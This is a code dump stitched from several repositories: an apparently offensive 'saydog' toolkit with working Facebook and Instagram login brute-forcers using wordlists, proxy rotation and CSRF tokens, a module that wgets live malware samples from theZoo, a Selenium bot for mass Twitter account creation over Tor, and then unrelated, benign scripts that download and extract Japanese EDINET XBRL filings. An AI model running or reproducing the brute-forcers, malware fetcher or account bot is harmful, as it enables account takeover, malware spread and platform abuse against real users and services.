print(r+'[!]'+w+' The user forces it to stop')
print(r+'[!]'+w+' Exiting program')
sys.exit(2)
def help():
print('')
print('BRUTEFORCE INSTAGRAM')
print('--------------------')
print('instagram bruteforce attack')
print('using wordlist with proxy and CSRF token')
print('')
print('command example')
print('------- -------')
print('set username [target] set username iqbalmh18')
print('set wordlist [path/name] set wordlist pass.txt')
print('show, show value show value')
print('run, go, exploit exploit')
print('')
print('other command description')
print('------------- -----------')
print('back back to main menu')
print('clear clear screen')
print('exit exit tool')
print('')
def imain():
global user
global wordlist
while True:
try:
ig = input(w+'saydog('+r+'socialbrute/instagram'+w+') > ')
if ig == 'help' or ig == '?':
help()
imain()
elif 'set username' in ig:
user = ig.split()[(-1)]
print('username > '+user)
elif 'set wordlist' in ig:
wordlist = ig.split()[(-1)]
print('wordlist > '+wordlist)
elif ig == 'show' or ig == 'show value':
print('')
print('-----------------------')
print('username : '+user)
print('wordlist : '+wordlist)
print('-----------------------')
print('')
elif ig == 'exploit' or ig == 'run' or ig == 'go':
os.system('python __mainig__.py -u '+user+' -w '+wordlist+' -p proxys.txt -d -v')
elif ig == 'clear':
os.system('clear')
elif ig == 'exit':
exit()
elif ig == 'back':
sys.exit(0)
except NameError:
print(r+'[!] Error:'+w+' [username] or [wordlist] not found')
except KeyboardInterrupt:
exit()
if __name__ == '__main__':
imain()
```
#### File: exploit/socialbrute/__mainfb__.py
```python
import time
import getopt
import sys
import httplib
import urllib
import re
u='\033[4m'
w='\x1b[00m'
r='\x1b[91m'
b='\x1b[36;1m'
y='\x1b[33m'
HEADERS = {
"Content-type": "application/x-www-form-urlencoded",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1",
# "Accept-Encoding": "gzip, deflate",
"Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
"Cookie": "locale=es_LA"
}
DATA = {
"return_session": 0,
"legacy_return": 1,
"display": "",
"session_key_only": 0,
"trynum": 1,
"timezone": 360,
"persistent": 1,
"default_persistent": 1,
"login": "Entrar"
}
def main(argv):
print "\x1b[36;1m[\x1b[00m-\x1b[36;1m]\x1b[00m Preparing for attack using wordlist"
print "\x1b[36;1m[\x1b[00m-\x1b[36;1m]\x1b[00m Bruteforce is running"
error, options = parse_args(argv)
if error or "help" in options:
usage()
return
DATA["email"] = options["username"]
host = "www.facebook.com"
port = 80
resource = "/login.php"
if "proxy" in options:
host, port = options["proxy"].split(":")
resource = "http://www.facebook.com/login.php"
running = True
waiting = False
found = False
count = 1
while running:
if not waiting:
count = 1
passwd = unicode(options["passdb"].readline().strip(), options["encoding"])
if not passwd:
break
try:
waiting = False
print "\x1b[33m[\x1b[00m-\x1b[33m]\x1b[00m Trying pass in wordlist {0}".format(passwd.encode(options["encoding"]))
conn = httplib.HTTPConnection(host, port)
# needs to be encoded in utf-8 for urlencode
DATA["pass"] = passwd.encode("utf-8")
params = urllib.urlencode(DATA)
conn.request("POST", resource, params, HEADERS)
response = conn.getresponse()
response = response.read()
conn.close()
if len(response.strip()) == 0:
found = True
print "========================================"
print "\x1b[36;1m[\x1b[00m-\x1b[36;1m]\x1b[00mPassword Founded: {0}".format(passwd.encode(options["encoding"]))
print "========================================"
break
elif response.find("menudo") != -1:
waiting = True
print "Waiting..."
time.sleep(60 * count)
count += 1
except Exception, err:
print "An error ocurred: ", str(err)
if not found:
print "\x1b[91m[\x1b[00m-\x1b[91m]\x1b[00m Password not founded, try again later!"
def parse_args(argv):
options = { "encoding": "utf-8" }
error = False
try:
opts, args = getopt.getopt(argv, "u:p:e:P:h", ["username=", "passdb=", "encoding=", "proxy=", "help"])
for opt, arg in opts:
if opt in ("-u", "--username"):
options["username"] = arg
elif opt in ("-p", "--passdb"):
options["passdb"] = open(arg)
elif opt in ("-e", "--encoding"):
options["encoding"] = arg
elif opt in ("-P", "--proxy"):
if not re.search("^(\w+|\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}):\d+$", arg):
raise Exception("Invalid format for proxy, should be host:port")
options["proxy"] = arg
elif opt in ("-h", "--help"):
options["help"] = True
else:
error = True
except Exception, err:
error = True
print str(err)
if "username" not in options or "passdb" not in options:
error = True
return error, options
def usage():
print """fb.py -u (Username) -p (password list name) [-e encoding] [-P proxy:port]""".format(__version__)
if __name__ == "__main__":
main(sys.argv[1:])
```
#### File: exploit/socialbrute/__mainig__.py
```python
from __future__ import print_function
from instabrute import *
import argparse
import logging
import random
import socket
import sys
import threading
r="\x1b[91m"
w="\x1b[00m"
c ="\x1b[36;1m"
y="\x1b[33m"
try:
import urllib.request as rq
from urllib.error import HTTPError
import urllib.parse as http_parser
except ImportError:
import urllib2 as rq
from urllib2 import HTTPError
import urllib as http_parser
try:
import Queue
except ImportError:
import queue as Queue
def check_proxy(q):
"""
check proxy for and append to working proxies
:param q:
"""
if not q.empty():
proxy = q.get(False)
proxy = proxy.replace("\r", "").replace("\n", "")
try:
opener = rq.build_opener(
rq.ProxyHandler({'https': 'https://' + proxy}),
rq.HTTPHandler(),
rq.HTTPSHandler()
)
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
rq.install_opener(opener)
req = rq.Request('https://api.ipify.org/')
if rq.urlopen(req).read().decode() == proxy.partition(':')[0]:
proxys_working_list.update({proxy: proxy})
if _verbose:
print(c+"[+]"+w+" Successfully connected with "+proxy)
else:
if _verbose:
print(r+"[!]"+w+" Failed to connect with "+proxy)
except Exception as err:
if _verbose:
print(r+"[!]"+w+" Failed to connect with "+proxy)
if _debug:
logger.error(err)
pass
def get_csrf():
"""
get CSRF token from login page to use in POST requests
"""
global csrf_token
print(y+"[+]"+w+" Trying to get CSRF token ...")
try:
opener = rq.build_opener(rq.HTTPHandler(), rq.HTTPSHandler())
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
rq.install_opener(opener)
request = rq.Request('https://www.instagram.com/')
try:
# python 2
headers = rq.urlopen(request).info().headers
except Exception:
# python 3
headers = rq.urlopen(request).info().get_all('Set-Cookie')
for header in headers:
if header.find('csrftoken') != -1:
csrf_token = header.partition(';')[0].partition('=')[2]
print(c+"[+]"+w+" CSRF Token : "+csrf_token)
except Exception as err:
print(r+"[!]"+w+" Oops, cant get CSRF token, please try again")
if _debug:
logger.error(err)
print("[!]"" Exiting ...")
exit(3)
def brute(q):
"""
main worker function
:param word:
:param event:
:return:
"""
if not q.empty():
try:
proxy = None
if len(proxys_working_list) != 0:
proxy = random.choice(list(proxys_working_list.keys()))
word = q.get()
word = word.replace("\r", "").replace("\n", "")
post_data = {
'username': USER,
'password': <PASSWORD>,
}
header = {
"User-Agent": random.choice(user_agents),
'X-Instagram-AJAX': '1',
"X-CSRFToken": csrf_token,
"X-Requested-With": "XMLHttpRequest",
"Referer": "https://www.instagram.com/",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
'Cookie': 'csrftoken=' + csrf_token
}
if proxy:
if _verbose:
print(y+"[-]"+w+" Password incorrect %s %s " % (word, proxy,))
opener = rq.build_opener(
rq.ProxyHandler({'https': 'https://' + proxy}),
rq.HTTPHandler(),
rq.HTTPSHandler()
)
else:
if _verbose:
print(y+"[-]"+w+" Password incorrect %s" % (word,))
opener = rq.build_opener(
rq.HTTPHandler(),
rq.HTTPSHandler()
)
rq.install_opener(opener)
req = rq.Request(URL, data=http_parser.urlencode(post_data).encode('ascii'), headers=header)
sock = rq.urlopen(req)
if sock.read().decode().find('"authenticated": true') != -1:
print(c+"\n[+]"+w+" Successful exploitation")
print(w+" Username: "+y, USER)
print(w+" Password: "+y, word)
found_flag = True
q.queue.clear()
q.task_done()
except HTTPError as e:
if e.getcode() == 400 or e.getcode() == 403:
if e.read().decode("utf8", 'ignore').find('"checkpoint_required"') != -1:
print(c+"\n[!]"+w+" Successfully login, but checkpoint")
print("")
print(r+"[!]"+w+" Username: "+y, USER)
print(r+"[!]"+w+" Password: "+y, word)
print("")
found_flag = True
q.queue.clear()
q.task_done()
return
elif proxy:
print(r+"[!] Error:"+w+" Proxy IP %s now is blocked by instagram" % (proxy,))
if proxy in proxys_working_list:
proxys_working_list.pop(proxy)
print(c+"[+]"+w+" Online Proxy: ", str(len(proxys_working_list)))
else:
print(r+"[!] Error:"+w+" Your IP now is blocked by instagram")
print(r+"[!]"+w+" Please use Proxy or VPN App")
else:
print(r+"[!]"+w+" Error:", e.getcode())
q.task_done()
return
except Exception as err:
if _debug:
print(r+"[!]"+w+" Problems in the proxy connection")
logger.error(err)
else:
print(r+"[!]"+w+" Problems in the proxy connection")
pass
return
def starter():
"""
threading workers initialize
"""
global found_flag
queue = Queue.Queue()
threads = []
max_thread = THREAD
found_flag = False
queuelock = threading.Lock()
print(y+"\n[-]"+w+" Preparing for attack ...")
print(c+"[!]"+w+" Bruteforce is running\n")
try:
for word in words:
queue.put(word)
while not queue.empty():
queuelock.acquire()
for workers in range(max_thread):
t = threading.Thread(target=brute, args=(queue,))
t.setDaemon(True)
t.start()
threads.append(t)
for t in threads:
t.join()
queuelock.release()
if found_flag:
break
print("")
print(y+"[!]"+w+" Bruteforce attack completed")
except Exception as err:
print(err)
def check_avalaible_proxys(proxys):
"""
check avalaible proxyies from proxy_list file
"""
socket.setdefaulttimeout(30)
global proxys_working_list
print(y+"[-]"+w+" Try connecting with a proxy list ...\n")
proxys_working_list = {}
max_thread = THREAD
queue = Queue.Queue()
queuelock = threading.Lock()
threads = []
for proxy in proxys:
queue.put(proxy)
while not queue.empty():
queuelock.acquire()
for workers in range(max_thread):
t = threading.Thread(target=check_proxy, args=(queue,))
t.setDaemon(True)
t.start()
threads.append(t)
for t in threads:
t.join()
queuelock.release()
print(c+"[+]"+w+" Successfully connected with "+ str(len(proxys_working_list))+" proxy")
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Instagram BruteForcer",
epilog="./instabrute -u user_test -w words.txt -p proxys.txt -t 4 -d -v"
)
# required argument
parser.add_argument('-u', '--username', action="store", required=True,
help='Target Username')
parser.add_argument('-w', '--word', action="store", required=True,
help='Words list path')
parser.add_argument('-p', '--proxy', action="store", required=True,
help='Proxy list path')
# optional arguments
parser.add_argument('-t', '--thread', help='Thread', type=int, default=4)
parser.add_argument('-v', '--verbose', action='store_const', help='Thread', const=True, default=False)
parser.add_argument('-d', '--debug', action='store_const', const=True, help='Debug mode', default=False)
args = parser.parse_args()
URL = "https://www.instagram.com/accounts/login/ajax/"
USER = args.username
THREAD = args.thread
_verbose = args.verbose
_debug = args.debug
user_agents = ["Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko)",
"Mozilla/5.0 (Linux; U; Android 2.3.5; en-us; HTC Vision Build/GRI40) AppleWebKit/533.1",
"Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko)",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201",
"Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0",
"Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))"]
try:
words = open(args.word).readlines()
except IOError:
print("[-]"" Error: Check your word list file path\n")
sys.exit(1)
try:
proxys = open(args.proxy).readlines()
except IOError:
print("[-]"" Error: Check your proxy list file path\n")
sys.exit(1)
# enable debugging if its set
if _debug:
# Logging stuff
logging.basicConfig(level=logging.DEBUG, filename="log",
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)
print(y+"[-]"+w+" Starting bruteforce attack to", USER)
print(y+"[-]"+w+" List of words found on file", str(len(words)))
print(y+"[-]"+w+" List of proxy found on proxys.txt", str(len(proxys)))
check_avalaible_proxys(proxys)
get_csrf()
starter()
```
#### File: module/malware/41.py
```python
import os,sys
import time
u='\033[4m'
w='\x1b[00m'
r='\x1b[91m'
b='\x1b[36;1m'
y='\x1b[33m'
def exit():
print(r+'[!]'+w+' The user forces it to stop')
print(r+'[!]'+w+' Exiting program')
sys.exit(1)
def corrupt():
print(r+'[?]'+w+' Command not found, please type help')
########### SHA ############
def thezoo():
while True:
try:
global name
global output
names = 'Junkie'
mg2 = input(w+'saydog('+r+'malware/'+names+w+') > ')
if mg2 == 'help':
print('')
print('Malware name: '+names)
print('-------')
print('command example')
print('------- -------')
print('set name [new name] set name saydog')
print('set output [path] set output /sdcard')
print('show show')
print('run, go, create create')
print('')
elif mg2 == 'exit':
exit()
elif mg2 == 'back':
malware()
elif mg2 == 'clear':
os.system('clear')
elif 'set name' in mg2:
name = mg2.split()[(-1)]
print('name > '+name)
elif 'set output' in mg2:
output = mg2.split()[(-1)]
print('output > '+output)
elif mg2 == 'show':
print('')
print('-------------------')
print('name : '+name)
print('output : '+output)
print('-------------------')
print('')
elif mg2 == 'run' or mg2 == 'go' or mg2 == 'create':
time.sleep(1)
print(y+'[-]'+w+' Generate malware '+names)
time.sleep(2)
print(y+'[-]'+w+' please wait for a minute ...')
os.system('wget https://raw.githubusercontent.com/ytisf/theZoo/master/malwares/Binaries/'+names+'/'+names+'.md5 -O '+output+'/'+name+'.md5')
os.system('wget https://raw.githubusercontent.com/ytisf/theZoo/master/malwares/Binaries/'+names+'/'+names+'.pass -O '+output+'/'+name+'.pass')
os.system('wget https://raw.githubusercontent.com/ytisf/theZoo/master/malwares/Binaries/'+names+'/'+names+'.sha -O '+output+'/'+name+'.sha')
os.system('wget https://raw.githubusercontent.com/ytisf/theZoo/master/malwares/Binaries/'+names+'/'+names+'.zip -O '+output+'/'+name+'.zip')
print(w+'\033[41m success \033[00m file saved as '+output)
else:
corrupt()
except NameError:
print(r+'[!] Error: '+w+'[name] or [output] not found')
except KeyboardInterrupt:
exit()
thezoo()
``` |
{
"source": "5l1v3r1/twitter-accounts-creator-bot",
"score": 2
} |
#### File: 5l1v3r1/twitter-accounts-creator-bot/accounts.py
```python
import sys
import time
import getopt
import simplejson
from selenium import webdriver
from SeleniumHelper import SeleniumHelper
class TwitterCreator(SeleniumHelper):
MOBILE_URL_CREATE = 'https://mobile.twitter.com/signup?type=email'
MOBILE_FIELD_SIGN_UP_NAME = '#oauth_signup_client_fullname'
MOBILE_FIELD_SIGN_UP_EMAIL = '#oauth_signup_client_phone_number'
MOBILE_FIELD_SIGN_UP_PASSWORD = <PASSWORD>'
MOBILE_FIELD_SIGN_UP_USERNAME = '#custom_name'
MOBILE_BUTTON_SKIP_PHONE = '.signup-skip input'
MOBILE_BUTTON_INTERESTS = 'input[data-testid="Button"]'
DESKTOP_URL_CREATE = 'https://twitter.com/signup'
DESKTOP_URL_SKIP = 'https://twitter.com/account/add_username'
DESKTOP_URL_MAIN = 'https://twitter.com'
DESKTOP_FIELD_SIGN_UP_NAME = '#full-name'
DESKTOP_FIELD_SIGN_UP_EMAIL = '#email'
DESKTOP_FIELD_SIGN_UP_PASSWORD = <PASSWORD>'
DESKTOP_FIELD_SIGN_UP_USERNAME = '#username'
DESKTOP_FIELD_SIGN_UP_PHONE = '#phone_number'
DESKTOP_FIELD_SIGN_UP_CODE = '#code'
DESKTOP_FIELD_SIGN_UP_SUGGESTION = '.suggestions > ul:nth-child(2) > li:nth-child(1) > button:nth-child(1)'
DESKTOP_FIELD_LOGOUT = '#signout-form'
DESKTOP_BUTTON_SKIP_PHONE = '.signup-skip input'
DESKTOP_BUTTON_CALL_ME = 'input[name="call_me"]'
DESKTOP_BUTTON_INTERESTS = 'input[data-testid="Button"]'
DESKTOP_PAGE_CONTAINER = '#page-container'
DESKTOP_PAGE_PHONE = '.PageContainer'
DESKTOP_PAGE_INI = '#doc'
def mobileCreateUser(self, row):
self.loadPage(self.DESKTOP_URL_CREATE)
self.waitAndWrite(self.DESKTOP_FIELD_SIGN_UP_NAME, row['name'])
self.submitForm(self.selectAndWrite(self.DESKTOP_FIELD_SIGN_UP_EMAIL, row['email']))
self.submitForm(self.waitAndWrite(self.DESKTOP_FIELD_SIGN_UP_PASSWORD, row['password']))
self.clickSelector(self.DESKTOP_BUTTON_SKIP_PHONE)
self.submitForm(self.waitAndWrite(self.DESKTOP_FIELD_SIGN_UP_USERNAME, row['username']))
self.waitAndClick(self.DESKTOP_BUTTON_INTERESTS)
#main_content > div.footer > form > input
time.sleep(9999)
# self.submitForm()
def desktopCreateUser(self, row):
self.loadPage(self.DESKTOP_URL_CREATE)
self.waitAndWrite(self.DESKTOP_FIELD_SIGN_UP_NAME, row['name'])
self.selectAndWrite(self.DESKTOP_FIELD_SIGN_UP_EMAIL, row['email'])
self.submitForm(self.selectAndWrite(self.DESKTOP_FIELD_SIGN_UP_PASSWORD, row['password']))
self.waitShowElement(self.DESKTOP_PAGE_CONTAINER)
self.loadPage(self.DESKTOP_URL_SKIP)
self.submitForm(self.waitAndWrite(self.DESKTOP_FIELD_SIGN_UP_USERNAME, row['username']))
self.waitShowElement(self.DESKTOP_PAGE_CONTAINER)
self.loadPage(self.DESKTOP_URL_MAIN)
time.sleep(9999)
def desktopCreateUserPhone(self, row):
self.loadPage(self.DESKTOP_URL_CREATE)
self.waitAndWrite(self.DESKTOP_FIELD_SIGN_UP_NAME, row['name'])
self.selectAndWrite(self.DESKTOP_FIELD_SIGN_UP_EMAIL, row['email'])
self.submitForm(self.selectAndWrite(self.DESKTOP_FIELD_SIGN_UP_PASSWORD, row['password']))
self.submitForm(self.waitAndWrite(self.DESKTOP_FIELD_SIGN_UP_PHONE, row['phone']))
row['code'] = raw_input('Code: ')
self.submitForm(self.waitAndWrite(self.DESKTOP_FIELD_SIGN_UP_CODE, row['code']))
self.waitAndClick(self.DESKTOP_FIELD_SIGN_UP_SUGGESTION)
self.submitFormSelector(self.DESKTOP_FIELD_SIGN_UP_USERNAME)
self.waitShowElement(self.DESKTOP_PAGE_CONTAINER)
self.loadPage(self.DESKTOP_URL_MAIN)
self.submitForm(self.waitShowElement(self.DESKTOP_FIELD_LOGOUT))
self.waitShowElement(self.DESKTOP_PAGE_INI)
def start(self, callbacks, inputFile, fromRow, toRow, driverType):
try:
rows = simplejson.loads(open(inputFile).read())
numElements = len(rows)
except:
numElements = 0
if numElements > 0:
if toRow == -1:
toRow = numElements
else:
if toRow > numElements:
toRow = numElements
fromRow -= 1
if fromRow < numElements:
self.driver = self.getWebdriver(driverType)
for numRow in range(fromRow, toRow):
row = rows[numRow]
print('Processing row: ' + str(numRow))
for callback in callbacks:
callback(row)
print('Processed.')
self.close()
else:
print('Index out of bounds')
else:
print('Data could not be extracted')
def getWebdriver(self, driverType):
if driverType == 'proxy':
profile = webdriver.FirefoxProfile()
profile.set_preference( "network.proxy.type", 1 )
profile.set_preference( "network.proxy.socks", "127.0.0.1" )
profile.set_preference( "network.proxy.socks_port", 9150 )
profile.set_preference( "network.proxy.socks_remote_dns", True )
profile.set_preference( "places.history.enabled", False )
profile.set_preference( "privacy.clearOnShutdown.offlineApps", True )
profile.set_preference( "privacy.clearOnShutdown.passwords", True )
profile.set_preference( "privacy.clearOnShutdown.siteSettings", True )
profile.set_preference( "privacy.sanitize.sanitizeOnShutdown", True )
profile.set_preference( "signon.rememberSignons", False )
profile.set_preference( "network.cookie.lifetimePolicy", 2 )
profile.set_preference( "network.dns.disablePrefetch", True )
profile.set_preference( "network.http.sendRefererHeader", 0 )
profile.set_preference( "javascript.enabled", False )
profile.set_preference( "permissions.default.image", 2 )
return webdriver.Firefox(profile)
elif driverType == 'headless':
return webdriver.PhantomJS()
else:
return webdriver.Firefox()
def main(argv):
fromRow = 1
toRow = -1
inputFile = None
driverType = 'proxy'
opts, args = getopt.getopt(argv, "f:t:i:d:")
if opts:
for o, a in opts:
if o in ("-f"):
fromRow = int(a)
elif o in ("-t"):
toRow = int(a)
elif o in ("-i"):
inputFile = a
elif o in ("-d"):
driverType = a
while not inputFile:
inputFile = raw_input('Input file path: ')
creator = TwitterCreator()
print('Process started')
creator.start(callbacks=[creator.desktopCreateUserPhone], inputFile=inputFile, fromRow=fromRow, toRow=toRow, driverType=driverType)
print('Process ended')
if __name__ == "__main__":
main(sys.argv[1:])
``` |
{
"source": "5laps2go/xbrl-reader",
"score": 3
} |
#### File: xbrl-reader/python/download.py
```python
import datetime
import sys
import os
import json
import urllib.request
import codecs
import zipfile
import time
from xbrl_reader import read_company_dic
root_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__))).replace('\\', '/')
download_path = root_dir + '/zip/download'
data_path = root_dir + '/python/data'
for path in [data_path, download_path]:
if not os.path.exists(path):
# フォルダーがなければ作る。
os.makedirs(path)
# 会社情報の辞書を得る。
company_dic = read_company_dic()
def receive_edinet_doc_list(day_path: str, yyyymmdd: str):
"""EDINETから書類一覧APIを使って書類一覧が入ったJSONオブジェクト取得して返す。
Args:
day_path (str): JSONオブジェクトを保存するフォルダーのパス
yyyymmdd (str): 日付の文字列
Returns:
書類一覧が入ったJSONオブジェクト
"""
# 書類一覧APIのリクエストを送る。
url = 'https://disclosure.edinet-fsa.go.jp/api/v1/documents.json?date=%s&type=2' % yyyymmdd
req = urllib.request.Request(url)
with urllib.request.urlopen(req) as res:
try:
body = json.load(res)
except json.decoder.JSONDecodeError:
print("書類一覧のデータが不正です。\nEDINETがメンテナンス中の可能性があります。")
sys.exit()
if body['metadata']['status'] == "404":
# 書類がない場合
print("報告書の取得を終了しました。")
return None
assert body['metadata']['message'] == "OK"
# JSONをファイルに書く。
json_path = "%s/docs.json" % day_path
with codecs.open(json_path, 'w', 'utf-8') as json_f:
json.dump(body, json_f, ensure_ascii=False)
return body
def check_zip_file(zip_path: str):
"""ZIPファイルが壊れていないか調べる。
Args:
zip_path(str): ZIPファイルのパス
Returns:
bool: 壊れていなければTrue
"""
try:
# ZIPファイルを開いて壊れていないか調べる。
with zipfile.ZipFile(zip_path) as zf:
file_list = list(zf.namelist())
return True
except zipfile.BadZipFile:
return False
def receive_edinet_doc(doc, dst_path):
"""EDINETから書類取得APIで決算情報のZIPファイルをダウンロードする。
Args:
doc : 書類オブジェクト
dst_path(str): ダウンロード先のパス
"""
edinetCode = doc['edinetCode']
company = company_dic[edinetCode]
# 提出日時、提出者名、提出書類概要、業種を画面表示する。
print("%s | %s | %s | %s" % (doc['submitDateTime'], doc['filerName'], doc['docDescription'], company['category_name_jp']))
# 書類取得APIのリクエストを送る。
url = "https://disclosure.edinet-fsa.go.jp/api/v1/documents/%s?type=1" % doc['docID']
with urllib.request.urlopen(url) as web_file:
data = web_file.read()
# 決算情報のZIPファイルに書く。
with open(dst_path, mode='wb') as local_file:
local_file.write(data)
if not check_zip_file(dst_path):
# ZIPファイルが壊れている場合
print("!!!!!!!!!! ERROR !!!!!!!!!!\n" * 1)
print("msg:[%s] status:[%s] reason:[%s]" % (str(web_file.msg), str(web_file.status), str(web_file.reason) ))
print("!!!!!!!!!! ERROR [%s] !!!!!!!!!!\n" % dst_path)
print(json.dumps(doc, indent=2, ensure_ascii=False))
print("!!!!!!!!!! ERROR !!!!!!!!!!\n" * 1)
os.remove(dst_path)
time.sleep(2)
time.sleep(1)
def select_doc(day_path, body):
"""書類一覧の中で対象となる書類を返す。
対象となる書類とは以下の条件を満たす書類。
* 有価証券報告書/四半期報告書/半期報告書またはそれの訂正書類。
* 財務局職員が修正した書類ではない。
* 会社情報の一覧に含まれる上場企業の書類
Returns:
対象書類
"""
for doc in body['results']:
docTypeCode = doc['docTypeCode']
if docTypeCode in [ '120', '130', '140', '150', '160', '170' ] and doc['docInfoEditStatus'] == "0":
# 有価証券報告書/四半期報告書/半期報告書またはそれの訂正書類で、財務局職員が修正したのではない場合
edinetCode = doc['edinetCode']
if edinetCode in company_dic:
# 会社情報の一覧に含まれる場合
company = company_dic[edinetCode]
if company['listing'] == '上場':
# 上場企業の場合
yield doc
def get_xbrl_docs():
"""ダウンロードのメイン処理
現在の日付から1日ずつ過去にさかのぼって書類をダウンロードする。
"""
# 現在の日付
dt1 = datetime.datetime.today()
while True:
# 1日過去にさかのぼる。
dt1 = dt1 + datetime.timedelta(days=-1)
yyyymmdd = "%d-%02d-%02d" % (dt1.year, dt1.month, dt1.day)
print(yyyymmdd)
day_path = "%s/%d/%02d/%02d" % (download_path, dt1.year, dt1.month, dt1.day)
if not os.path.exists(day_path):
# フォルダーがなければ作る。
os.makedirs(day_path)
os.chdir(day_path)
json_path = "%s/docs.json" % day_path
if os.path.exists(json_path):
# 書類一覧のJSONファイルがすでにある場合
with codecs.open(json_path, 'r', 'utf-8') as f:
body = json.load(f)
else:
# 書類一覧のJSONファイルがない場合
body = receive_edinet_doc_list(day_path, yyyymmdd)
if body is None:
break
time.sleep(1)
for doc in select_doc(day_path, body):
dst_path = "%s/%s-%s-%d.zip" % (day_path, doc['edinetCode'], doc['docTypeCode'], doc['seqNumber'])
if os.path.exists(dst_path):
# すでに決算情報のZIPファイルがある場合
if check_zip_file(dst_path):
# ZIPファイルが壊れていない場合
continue
# 壊れているZIPファイルは削除する。
os.remove(dst_path)
# EDINETから決算情報のZIPファイルをダウンロードする。
receive_edinet_doc(doc, dst_path)
if __name__ == '__main__':
get_xbrl_docs()
```
#### File: xbrl-reader/python/extract.py
```python
import os
import zipfile
from pathlib import Path
import re
import codecs
import multiprocessing
from multiprocessing import Process
root_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__))).replace('\\', '/')
data_path = root_dir + '/python/data'
download_path = root_dir + '/zip/download'
extract_path = root_dir + '/zip/extract'
def get_zip_dic():
"""EDINETコードとダウンロードしたZIPファイルのリストの辞書を返す。
* 辞書のキー : EDINETコード
* 辞書の値 : ダウンロードしたZIPファイルのリスト
Returns:
辞書
"""
dic = {}
# ダウンロードのフォルダーにあるすべてのZIPファイルに対し
for zip_path_obj in Path(download_path).glob("**/*.zip"):
zip_path = str(zip_path_obj)
# EDINETコードをファイル名から得る。
edinetCode = os.path.basename(zip_path).split('-')[0]
if edinetCode in dic:
# EDINETコードが辞書にある場合
dic[edinetCode].append(zip_path)
else:
# EDINETコードが辞書にない場合
dic[edinetCode] = [ zip_path ]
return dic
def group_zip(cpu_count, cpu_id, dic):
"""CPUごとのサブプロセスの処理
EDINETコードをCPU数で割った余りがCPU-IDに等しければ処理をする。
Args:
cpu_count(int): CPU数
cpu_id (int): CPU-ID (0, ..., CPU数 - 1)
dic : EDINETコードとダウンロードしたZIPファイルのリストの辞書
"""
xbrl = re.compile('XBRL/PublicDoc/jpcrp[-_0-9a-zA-Z]+\.xbrl')
for edinetCode, zip_paths in dic.items():
assert edinetCode[0] == 'E'
if int(edinetCode[1:]) % cpu_count != cpu_id:
# EDINETコードをCPU数で割った余りがCPU-IDに等しくない場合
continue
extract_sub_path = '%s/%s' % (extract_path, cpu_id)
if not os.path.exists(extract_sub_path):
# 抽出先のフォルダーがなければ作る。
os.makedirs(extract_sub_path)
# 抽出先のZIPファイルのパス
extract_zip_path = "%s/%s.zip" % (extract_sub_path, edinetCode)
print(extract_zip_path)
# 抽出先のZIPファイルを書き込みモードで開く。
with zipfile.ZipFile(extract_zip_path, 'w', compression=zipfile.ZIP_DEFLATED) as new_zip:
# ダウンロードしたZIPファイルのリストに対し
for zip_path in zip_paths:
try:
# ダウンロードしたZIPファイルを読み取りモードで開く。
with zipfile.ZipFile(zip_path) as zf:
# ダウンロードしたZIPファイル内のXBRLファイルに対し
for xbrl_file in [x for x in zf.namelist() if xbrl.match(x)]:
# XBRLファイルのデータを読む。
with zf.open(xbrl_file) as f:
xml_bin = f.read()
# 抽出先のZIPファイルの中にXBRLファイルを書く。
file_name = xbrl_file.split('/')[-1]
new_zip.writestr(file_name, xml_bin)
break
except zipfile.BadZipFile:
print("\nBadZipFile : %s\n" % zip_path)
continue
if __name__ == '__main__':
dic = get_zip_dic()
cpu_count = multiprocessing.cpu_count()
process_list = []
# CPUごとにサブプロセスを作って並列処理をする。
for cpu_id in range(cpu_count):
p = Process(target=group_zip, args=(cpu_count, cpu_id, dic))
process_list.append(p)
p.start()
# すべてのサブプロセスが終了するのを待つ。
for p in process_list:
p.join()
```
#### File: xbrl-reader/python/stats.py
```python
import os
import codecs
root_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__))).replace('\\', '/')
data_path = root_dir + '/python/data'
def dump_ele(tree_f, max_len_dic, ele, nest, processed):
if not ele in max_len_dic.keys():
return len(processed)
if ele in processed:
if tree_f is not None:
tree_f.write("%s%s %s *\n" % (" "*nest, ele.verbose_label, ele.id))
else:
processed.add(ele)
if tree_f is not None:
tree_f.write("%s%s %s\n" % (" "*nest, ele.verbose_label, ele.id))
for x in ele.child_elements:
dump_ele(tree_f, max_len_dic, x, nest + 1, processed)
return len(processed)
def set_max_len_parent2(top_items, max_len_dic, ele):
if len(ele.parents) == 0:
top_items.add(ele)
return 0
if len(ele.parents) == 1:
return set_max_len_parent(top_items, max_len_dic, ele.parents[0]) + 1
parent_lens = [ set_max_len_parent(top_items, max_len_dic, x) for x in ele.parents ]
max_len = max(parent_lens)
for parent, parent_len in zip(list(ele.parents), parent_lens):
if parent_len < max_len:
assert parent in ele.parents
ele.parents.remove(parent)
assert ele in parent.child_elements
parent.child_elements.remove(ele)
return max_len + 1
def set_max_len_parent(top_items, max_len_dic, ele):
if ele in max_len_dic:
return max_len_dic[ele]
max_len = set_max_len_parent2(top_items, max_len_dic, ele)
max_len_dic[ele] = max_len
return max_len
def write_calc_tree(context_names, ns_xsd_dic, annual_account_stats, quarterly_account_stats, rank = 200):
instant_account_dic = set()
duration_account_dic = set()
# 報告書の種類ごとに
for report_name, account_stats in zip([ "有価証券報告書", "四半期報告書" ], [annual_account_stats, quarterly_account_stats]):
# 会計基準ごとに
